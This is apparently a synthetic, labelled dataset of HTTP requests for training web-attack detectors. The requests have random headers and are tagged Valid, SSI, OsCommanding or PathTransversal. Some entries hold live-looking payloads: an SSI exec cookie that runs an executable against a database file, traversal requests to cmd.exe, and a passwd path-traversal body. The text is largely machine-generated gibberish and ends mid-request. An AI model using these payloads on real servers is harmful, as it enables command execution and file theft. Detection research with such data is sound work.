Content-MD5: ZXlidWFzTlY0Y2ZzaXRVbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 19:15:57 UTC
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: www.tsdE38Zen.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: ncdstPZ='SE'
Client-ip: 163.214.174.140
Cookie: 7l=51244;rets=a0havingv6evalEn/u
Cookie2: $Version="878"
Date: Mon, 17 Jul 06 19:11:01 GMT
ETag: "2Owh1m2iJKJpAV1Rt"
Expect: 100-continue
From: p9ot@shsomno.org
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: "r7MY7qmMKQfbKI0kE"
If-Range: Sat, 27 Aug 05 03:27:55 CET
Max-Forwards: 05
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://5ouir.org/eRUt5/pf1i/zsrn/Bt5le.tar
TE: chunked
Trailer: TE
User-Agent: madtttr/1.2.8
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: FTP/3.8 210.180.167.120, hd3/8.1 www.tdoAh.css:03
Transfer-Encoding: As0i; doas=foma
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rneptd1ra=6cn&Fe=isldl)(   |(oeR=*)&oreghmesunp=9M.SjV2Aj&sAoiv3nn=2

End - Id: 37652
Start - Id: 7251
class: Valid
POST /eanwzJheQWHnEA3/xY1cP.cfm? HTTP/1.1
Content-Length: 175
Content-Language: 9ye9O
Content-Encoding: gzip
Content-Location: http://flmNe.it/idT8y/oeizfds/Naor/e6et.jpeg
Content-MD5: VmZpYW42dGtmQTVsTmV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Aug 06 07:21:08 GMT
Last-Modified: Wed, 03 Jan 07 15:23:52 CET
Host: 122.119.160.164
Connection: keep-alive
Accept: audio/basic, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, identity;q=0.2, identity;q=0.8, compress;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 157.80.150.41
Cookie: atyc0en9sl=223;r-BDeAa=a (u
Cookie2: $Version="9"
Date: Mon, 27 Apr 09 22:47:37 CET
ETag: W/"peUbjB681TZ3ZHuUU"
Expect: trene=ontocto
From: ciTtltrE@srots.ch
If-Modified-Since: Thu, 21 Oct 04 11:14:34 GMT
If-Unmodified-Since: Mon, 17 Nov 08 24:23:05 GMT
If-Match: "sjB7NcwugEUzGY6lklK"
If-None-Match: "w-@xrV1JasG6.Md1"
If-Range: *
Max-Forwards: 420
MIME-Version: 8.1
Pragma: oNrafw='nnlofn'
Proxy-Authorization: Basic bnRkZVd2OnVpaE9Fc2Fu
Authorization: NTLM RW9vQXNqM1RyZHR0c3pva09jcmVscnNyS2FlU2N0cnRqZnJlYWhuZQ==
Range: -805
Referer: http://uSI0f.cz/a5hpm/t6e0C/rnh6/tish.asp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.0 (compatible; Konqueror/1.2; Win 9x; thot1Ay; shRc; 1os7rk9uas)
UA-CPU: StrongARM
UA-Disp: 431,6769,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 629x010
Via: 7.1 43.92.192.8:36, 7.4 www.s8hvh.css
Transfer-Encoding: compress
Upgrade: yehEh/2.5, feed9e/6.0, Sa702/4.0, nen7e/2.2
Warning: 031 192.107.13.65:1583 "eezimxle" 
X-Forwarded-For: 213.154.127.217
X-Serial-Number: 35067124458
----: --------------
~~~~~: ~~~~~~~~~~~

4yotndbddai9ba2=6&Qi.TPallZDDCe=)fsE6ttn:en9i >&lt=tuSCTRtOf0&e9ea4=sat]D\srsystemegryitelnetr&6e6n1ubEuta1tet=8165259559&hesonyh=uqG&bkt5Rihct=29165&Ia3iiersga=0837

End - Id: 7251
Start - Id: 29725
class: Valid
GET /anra/sht/deleteeMhmet.tiff?nGV_y=4&tyaietkuxglt=A&eeoaeltoIs=oitlw9hohttpE3 HTTP/1.0
Host: www.ddgs8o.cz:80
Connection: keep-alive
Accept: image/gif;q=0.7
Accept-Charset: x-mac-greek, x-mac-ce;q=0.1, x-mac-chinesesimp;q=0.7, big5, big5
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.28.171.106
Cookie: YH-.IW2boot.ini=oDacmdlh$d>elErsiery;otiank=(w4egroup byo0ar6oh2h;cwaFohasssacnu=hcsett16xlo92a:;leillheiFexa=ue;hursmS8tegpn1po=ohobe-i/a;7ssogine7A=1804222
Cookie2: $Version="061"
Date: Thu, 14 Aug 08 08:19:15 GMT
ETag: W/"-V4WwGdxwEokSj2CN"
Expect: diebe
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Sun, 24 Jul 05 03:06:59 GMT
If-Unmodified-Since: Mon, 31 Oct 05 14:48:29 GMT
If-Match: *
If-None-Match: "J0BZVr38p-EWlqy"
If-Range: "kcDI7gwH@Bh6ik0BrX"
Max-Forwards: 440
MIME-Version: 3.4
Pragma: rt4kN=ts6s
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ootai ytrdsee=hhwhfeo
Range: 8-,7343-94485
Referer: http://eHYtelw.uk/rpFgOua.php3
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.9 (Windows; U; Win98 6.4; s2-ne; rv:8.9.8) Gecko/23625508
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1488x053
Via: 3.0 www.resfNe.tiff, FTP/9.1 141.45.125.12, 5.7 219.74.77.213
Transfer-Encoding: deflate
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 520 167.29.73.134 "smwarc7uRes0do" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 23055692041391368156
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29725
Start - Id: 28722
class: Valid
GET /ltag/v7TPkZtLtOwHawhere/uoevieic69/i0.dll?icaRiou5ra6euz=E2Drtt&niiwets=051500&oet7r5rolesd2=1&J2mp2sQ=Czfoos%3B%26tH&1CacceptN3mkF_Pk=mochaaeowget HTTP/1.0
Host: www.x5ewrqh.be
Connection: eyuha
Accept: text/xml, video/*;q=0.3, image/*
Accept-Charset: hz-gb-2312;q=0.3, macintosh;q=0.6, windows-1257, windows-1255
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: max-age=5397
Client-ip: 7.143.6.122
Cookie: tahom5n=sq8ch=0atW:
Cookie2: $Version="7"
Date: Sat, 19 Jul 08 11:52:49 UTC
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: wiha=9ueo5w;uns1sl
From: cmNaehb@twerq2.gov
If-Modified-Since: Sun, 25 Jan 09 08:51:46 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:38:55 UTC
If-Match: *
If-None-Match: "kK4WdFOi7yI_K7F"
If-Range: *
Max-Forwards: 29
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="P5en"
Range: -5
Referer: /tenrd/yqnb/hnnssw.msf
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: omdne/8.1.7.1
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: FTP/1.0 www.tAsa2aw.htm, FTP/5.1 88.190.56.133
Transfer-Encoding: d4nit
Upgrade: fsum1e/6.1, i6ee/7.9, ijopmA/5.0, jtoin/2.2
Warning: 642 11.210.65.54:24773 "arbhrinytrt" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28722
Start - Id: 8673
class: Valid
GET /s3sOj/4seo/mdvf9ne85rere2RiTi/Helt/otvvPoOin-0ZbEPtJ/QRB8hLup@netcatOkAy@/5.@E9/om6penrnoiunyuar/iL4-W/s7O/jsrgfn6dN.jpg?ufsTre0vtccNI8o=to0&oaslrwmitqigtNo=wei&gFedr=r-gk48&0eieyteoEee=32&cE=iajOtmnt4rdnah&gd3eldWGOylehn=n1rnbody&qnanayIiden7=rs9ehee1nuee&MsufE9ln=nfnJ9dGufG HTTP/1.1
Host: 138.164.155.63:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.1, identity;q=0.8, gzip;q=0.2
Accept-Language: vTn-the;q=0.2
Cache-Control: max-age=78
Client-ip: 139.7.102.37
Cookie: tdnntGi9lt3t1b=el;ebodyREU5ZPpsRV=uierr e(-svsenph-h1v;o5o=36;of=6fiwlT;fo4aXnanlienf7m=3536782;iinEG=itZRTPH4-a
Cookie2: $Version="778"
Date: Sat, 04 Jul 09 04:23:00 UTC
ETag: "iY9VMKxeuws3lNflAJKJ"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Thu, 21 Sep 06 07:22:21 GMT
If-Unmodified-Since: Fri, 24 Oct 08 17:46:36 UTC
If-Match: *
If-None-Match: "83GHmH_0jY@qzvF"
If-Range: "1.kIhHuaBABfsMlPp"
Max-Forwards: 2
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="DbdAB10dA04Cb5E87ec2504c6CDbdbE0"
Authorization: Digest username="ep7gt"
Range: -766,58-986789
Referer: http://www.rtpibqec.biz/bcroa/Wlo8ea/otHst/mbaqca/gvfye.mspx
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 7.8; fr-rs; rv:8.7.0) Gecko/99939567
UA-CPU: MIPS
UA-Disp: 953,263,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8393x485
Via: FTP/9.6 211.16.111.84, 4.0 119.242.24.211
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 173 52.61.224.109 "iicxlea7tnjtatQp" 
X-Forwarded-For: 199.125.170.108
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8673
Start - Id: 11620
class: Valid
GET /ruwgdlhdhauetek2y/9jgrEUxoF4/utefveilpbe/n3RD_IV/REoA/unrrePA2zmasncr3/FM6DJcscriptIflCmHU/tDiol2ismaestpeg9iae/nEaple6orz6eea/sgOVh/6taetWitsIo.js?eejd=se&ymIwliOesttta=jgattttsUte&dAc=%2Fs+r0logrr5eabr3&msasil6hagnmnOn=nlocationhEtdive&e64AcwnE=lO%3FzGservicesfg339Hh&rs7in8gwustbb=passthruihnf&zr4znsma=suaos&ktn=no&mszn09tcmt=ht HTTP/1.0
Host: 29.47.218.54
Connection: hlesorlo
Accept: */*;q=0.5
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: 
Accept-Language: Gr4EadHt-Jmeteni;q=0.1
Cache-Control: no-transform
Client-ip: 95.90.20.151
Cookie: Ta=43ioW9tyaqttdm;esgsod3skissdos=openda
Cookie2: $Version="139"
Date: Sat, 13 Jan 07 09:13:33 CET
ETag: "1XQQfpNQ_PCXGJdpK"
Expect: iRorbi=nmhidx
From: llde@xop7tnntt.de
If-Modified-Since: Sun, 09 May 04 03:13:26 CET
If-Unmodified-Since: Tue, 08 May 07 17:20:04 UTC
If-Match: *
If-None-Match: "CY7J5D1mgLwHweip_VY"
If-Range: Thu, 06 Apr 06 13:26:44 GMT
Max-Forwards: 0470
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWViczBoc2F5cFVvaWxidGl1ZWVpYW9yYW5la2lpZW9ra2FscGk=
Authorization: NTLM Y2V5b2dyZXNPTnY3dTBlZHBhaGhvbmhuMnJzaGVub3RjYW1CbnJydDRr
Range: 4-343448,-16531
Referer: http://wismdrd.ch/es8neu/so3iy3a.cgi
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: neaeur6r
UA-CPU: x86
UA-Disp: 3478,401,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3585x2586
Via: HTTP/3.7 www.dcLtSnte.js, ssh/6.3 www.m4ro.gif
Transfer-Encoding: compress
Upgrade: Hsoeo/0.1, t4K/8.3, iwhfu/8.2
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 44.159.255.205
X-Serial-Number: 046539438868930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11620
Start - Id: 40239
class: SSI
GET /DdoPp6NuIFojW5/ysvCvsmr5glo.ai/i0tetc/ehspRa.jpeg?Sal98.DYwBu=hh3sljo&apolctt=tDINEm0&ti8nn5h1wnde=jwzse&sbmvt=vbscriptiA+1yrcp%27zlecat5delete1a HTTP/1.0
Host: www.Cxpfeb6r.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.4, identity;q=0.6
Accept-Language: 0-etl, Syljjnst-rri
Cache-Control: max-age=70839
Cookie: rlgt4=rS9hgf;MCAerrygltisih=00565;oS_BlSCT=<!--   #exec   cmd="c:\progra~1\6neN2r\qnraj\aadeq9.exe  d:\hs\www.leongeasge.org\NrPtatI\database.mdb     /x  exporttofoxpro"-->;HaHGMoVJIlIU=333
Cookie2: $Version="1"
Date: Wed, 14 Jul 04 02:53:08 UTC
ETag: ".eBfmCL.9TB7D.4B6OT"
Expect: nucinot=efnecs;fdrr
If-Modified-Since: Sat, 11 Mar 06 22:56:11 UTC
If-Unmodified-Since: Tue, 05 Jun 07 05:43:43 GMT
If-Match: "iExmLG1tM03LDRY"
If-None-Match: *
If-Range: Thu, 04 Mar 10 03:32:30 UTC
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic dnB0cnRkb2U6YWViZTRFMnQ=
Authorization: Basic U25vcmVsaW86MzVldGw=
Referer: /LllaemNu.mpg
TE: gzip,gzip
Trailer: If-Range
User-Agent: ebMaBO_9 http://www.8nHit.fr
UA-Disp: 2564,0852,8
UA-OS: Win9x
Via: HTTP/8.7 148.111.220.127:4264
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40239
Start - Id: 18038
class: Valid
GET /iFBTfJbs5nonEXdg70/ntduhb/aHoB/rMpvarJopt9ftP62gxO/bIEQL6rf@x-j/puTT.NUjpFJ.6mg@/tmr/mU1U-qZXTEQJM.mdb?2OaBwkB420a1i=tk_.&tlsnsoav=4systemam%7Eeeinnyysc&ime=90275181&iEli0eoo=hjL3VRUp&w7ostmaswsrnisi=tSi2LT%40Ok&ee=edenknleiet&Uctif=Re&aynhTdpRnetas=r%3Ct+l&tv33neESuu=1&lt5izM3=du7t%7C%282er HTTP/1.0
Host: 69.57.42.234
Connection: close
Accept: image/png;q=0.5, application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 98.159.11.181
Cookie: VCgl0P=3lelehmniu1;juofnesgxldin=hd;ts=lwPeN47vl8Eg;teArat=451573;heaTw=%raeT;Pra6zLAM=3967575
Cookie2: $Version="506"
Date: Wed, 04 Nov 09 03:23:25 CET
ETag: "Y5XVc5vLTuEmHw7jl"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Sun, 02 Aug 09 06:45:11 UTC
If-Unmodified-Since: Sun, 29 Apr 07 04:09:17 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Nov 09 23:53:54 GMT
Max-Forwards: 14
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="aicatet"
Authorization: Digest opaque="5stn"
Range: 223-,754-
Referer: http://www.qcogri.biz/7ztsNd.wmn
TE: trailers,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: mmlatoSNaysnea0
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 258x9628
Via: 7.9 www.Ilhso0Ar.jpg
Transfer-Encoding: compress
Upgrade: mnit2e/4.0, 20vtg/4.8, nef3hy/1.1
Warning: 923 136.21.74.55:3970 "tpeOiltiem" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 9297794233
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18038
Start - Id: 3639
class: Valid
GET /sug9y4Ngap-/nz/xp_2/gZq/S7liztiEpn5diiomsa/c7xGoKZ7Or.ppD7s-/iOxm.MdTNdS21.shtml?Hgim=eKG&rsosYEpi5Thr=36975271&F5253imgu4jT=13&QoYR8kZ_C=heryeeolosihste&egtn=8%29 HTTP/1.0
Host: www.eeScIrEro.biz:80
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.6
Accept-Encoding: deflate, identity, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 247.34.126.105
Cookie: ic2eaA=hlogmwhereautoexecued-txt;s8mNmh=rtb;r2u=oatohehsvtouauuzc;lBlikevTdocumentiJy=o\ec9&r@me8t2Y?otelnet;peieexno0ftiur=|;scauyneoiwstvfj=1372691685
Cookie2: $Version="387"
Date: Mon, 02 Nov 09 05:44:12 GMT
ETag: "kKa@X1stg9PBNpTOZ"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: iaeitS7@hsAh8.fr
If-Modified-Since: Thu, 26 Jan 06 17:56:51 GMT
If-Unmodified-Since: Thu, 04 Aug 05 07:06:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: Digest algorithm=MD5-sess
Range: -66041,943-,-24
Referer: /sghnOxyi/caoodoe.cgi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: tiirnp18at (tbuX5crn; oKcRe4; hfeEl2f; htirBH@uX_; eeGP@S)
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 767x775
Via: 9.2 131.248.157.138
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 743 www.dejhzUo.png "iisl" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3639
Start - Id: 20986
class: Valid
GET /idPJ4ffs79ONT4CZtpb.shtml?isns=u8&r6paL=52&VIqlM=%3B%24n0 HTTP/1.1
Host: 139.238.209.189
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.27.197.117
Cookie: iKb9af=g9l;mqi6meod=eojs(t;oelbosohcJ=3ddv5Eslijfnr0is;rt9odlcTlDthnut=eogurtSnn y>pftn
Cookie2: $Version="073"
Date: Sat, 09 Dec 06 11:52:03 UTC
ETag: "ej49WIZ7auhUywwZwW41"
Expect: enii1Rn=icktpe
From: t5guuL@7oos1nltc0.de
If-Modified-Since: Mon, 02 Aug 04 11:02:49 UTC
If-Unmodified-Since: Mon, 05 Apr 10 24:16:37 GMT
If-Match: *
If-None-Match: "Q43oj475ls36A5VL"
If-Range: Tue, 25 Oct 05 02:58:04 GMT
Max-Forwards: 92
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic ZW9sVnRhdGU6Y05jeXllbg==
Authorization: Digest realm
Range: 8-7,-0713,855020-
Referer: http://www.mwhtltc5.ch/iipe0if/uo0lb.txt
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/7.6 (Machintosh; U; PPC Mac OS X 3.4; rd-ea; rv:9.8.4) Gecko/48840391
UA-CPU: x86
UA-Disp: 9418,2909,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 358x903
Via: 1.5 193.150.128.66
Transfer-Encoding: deflate
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 944 www.gottr.shtml "wsoRtadsxtnNaanhe" 
X-Forwarded-For: 124.152.206.172
X-Serial-Number: 40381242667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20986
Start - Id: 44374
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 60.49.184.174
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=84680
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="5"
Date: Fri, 08 Feb 08 19:07:05 CET
ETag: "hRtyES0J8kvkJHkX"
Expect: sHulneie=8tshds;ergxc
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 07 Dec 06 16:09:40 GMT
If-Unmodified-Since: Sat, 24 Nov 07 11:00:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest qop=auth
Range: -592489
Referer: http://www.icethasi.fr/5aih/yqe1Rg/Za0waOne/tcpaFea/sxtlburh.png
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.5 (X11; U; Unix 1.4; dj-ar; rv:3.6.6) Gecko/77025429
UA-CPU: x86
UA-Disp: 0327,603,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: 5.4 240.50.136.50:26, 5.6 www.4a0wid.css
Transfer-Encoding: gzip
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44374
Start - Id: 46123
class: PathTransversal
POST /tuenIeND8ttl/tqXk_Yqud/rShQw33.sTZKp.cfm? HTTP/1.1
Content-Length: 98
Content-Language: 4sxsii
Content-Encoding: deflate
Content-Location: /h5nsp/oioeq6/onloo.ace
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 04 Oct 07 03:14:09 GMT
Host: 222.139.134.54:7
Connection: keep-alive
Accept: application/zip
Accept-Charset: big5;q=0.5, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: in-s7nhm, te8Oo-aM, cDt1f9-hvlag;q=0.5, umttu-slejtro;q=0.2
Cache-Control: no-cache
Date: Sun, 30 Nov 08 17:17:19 UTC
If-Unmodified-Since: Mon, 24 Apr 06 04:59:31 CET
If-Range: Tue, 11 Sep 07 12:11:09 UTC
Max-Forwards: 068
Range: 55330-08,72-9
Referer: /ieR6gael/tcEtne/aas2/Tnledu/nddee.asmx
User-Agent: pajI2ontbe/8.6
UA-Color: color16
UA-Pixels: 7867x399
Via: aAe8/3.5 99.243.113.226, 9.2 144.231.61.15, ous/3.1 www.sLHte.css
Upgrade: ocfh3/0.8, wds/5.3, eda/9.0, eSS/4.4, ikt/4.1
Warning: 398 www.erno.tiff:75 "uaihrtmhhjaneIbin" 
----: ----------------------------------------

icodtiat=nomts7tctaxiAoprs&passeshnUto=/,,,/7shmad/ek/passwd&tn6apriSlAnRft=hhvotyis

End - Id: 46123
Start - Id: 6635
class: Valid
PUT /kedahef9rn/eWRULvlGQST/1arohwddAoetotk/eihph5zeeahs/rptmdua6moghunuoeclm.html? HTTP/1.0
Content-Length: 134
Content-Language: aoeaGvi
Content-Encoding: gzip
Content-Location: /qrahatei/eiRgorhs/B2rs/dvnhomdt.sh
Content-MD5: YW5sYXF0ZWZvT2VudHVzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Apr 05 05:54:22 GMT
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: 199.184.20.160:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, compress
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 46.201.126.153
Cookie: shha=27157939;xlnmmgTetekllA=ii;oe=a
Cookie2: $Version="58"
Date: Mon, 02 Jun 08 12:16:20 UTC
ETag: W/"v7N@UYgIYxK63@18EeG"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Sun, 21 Jan 07 06:00:38 UTC
If-Unmodified-Since: Fri, 14 Apr 06 13:48:16 UTC
If-Match: "iVySfJL6RhjdaESvXK"
If-None-Match: *
If-Range: Mon, 27 Feb 06 04:12:12 UTC
Max-Forwards: 09
MIME-Version: 0.0
Pragma: as='xreimoed'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: nie9v mbstnt=uhIrntbi
Range: -08,-241,7-856
Referer: http://qniesxe.gov/bot5/9o6nhm7d/e4nTrTj.css
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/9.7 (compatible; Konqueror/5.8; Linux i386; riimojew)
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: 1.6 32.129.50.31, FTP/7.9 www.r1eNalfb.png:110
Transfer-Encoding: gzip
Upgrade: rvt/4.2
Warning: 001 www.iorone.html "gugtrnnrNyCri0wroi" "Sun, 28 Mar 10 10:39:19 CET"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

La0irfhi2rpja=076&t6iM=[@elike&YTP2N=bmQ0&loBOqNBxNtmpe=eabn&rnminoeeres=807023042&afb6iz1=auer23xt&rig5csalemrypo=t0Fw0&u7Ru=4bin

End - Id: 6635
Start - Id: 20148
class: Valid
GET /WhrttrDl/5o6turas/fzu8arsca44u/ivJekwlnh/snpdn/ti44uhndadalt/wny0osaftd8/f.W9ISw9Y/rSMlinkoITrcp596m5.asp?gisQvPKUXn=5914663408&inmlte5eiNms=eeianGWis5&7naele77ua=1407&m1tR_Qmail.B.=oEnc&xa=04615&.nRaSzUTeR=eqCO&hIatetoChb=4163627&nohBk0=1&tetosha9es=a+jn-o7t+%24w43rw&zic=%7Ehrnph-L%2FRlinkprocessing-instructionl%26nt4eup&2FtUsf=487180913 HTTP/1.1
Host: www.hziyme.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mvewate-gelfebwc;q=0.1, 5q2tDt0-e;q=0.5, eceui-tui0o3;q=0.4
Cache-Control: no-store
Client-ip: 214.150.98.24
Cookie: oifGE=9ro Sale
Cookie2: $Version="3"
Date: Wed, 14 Jul 04 03:18:41 GMT
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: lsdoo
From: sb62@aupq5s0rh.st
If-Modified-Since: Sun, 10 Jan 10 03:10:11 CET
If-Unmodified-Since: Sun, 31 May 09 03:45:19 CET
If-Match: "wGkeGl2UjyUDMon5"
If-None-Match: *
If-Range: Fri, 14 Jul 06 12:30:43 CET
Max-Forwards: 384
MIME-Version: 8.4
Pragma: at7te=ee8b7px
Proxy-Authorization: Basic TmVyaWI6YU11c24=
Authorization: Digest username="aodtd"
Range: -04261
Referer: /8elrlt/ne4nm/wty5.mpg
TE: trailers,deflate
Trailer: Date
User-Agent: eNMdj9EgS http://www.nlfn.uk
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: HTTP/1.5 www.arncNefb.shtml, FTP/9.8 www.ahdefoqs.gif
Transfer-Encoding: gzip
Upgrade: hnPta/7.8, tro/4.6, hwu/0.0, nlnfh8/7.1, jh3tT/8.7
Warning: 965 13.56.207.189 "8oeegdte" "Wed, 18 Feb 04 20:29:21 GMT"
X-Forwarded-For: 147.125.181.72
X-Serial-Number: 67193575872
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20148
Start - Id: 44133
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tuxwhAat.de
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ArvAelh-ns, sae-he5erse, thllahnr-qjvrAdcu
Cache-Control: max-age=1769
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="549"
Date: Tue, 15 Mar 05 09:07:01 GMT
ETag: "G3tMuf5X5f@OyB7Fh"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
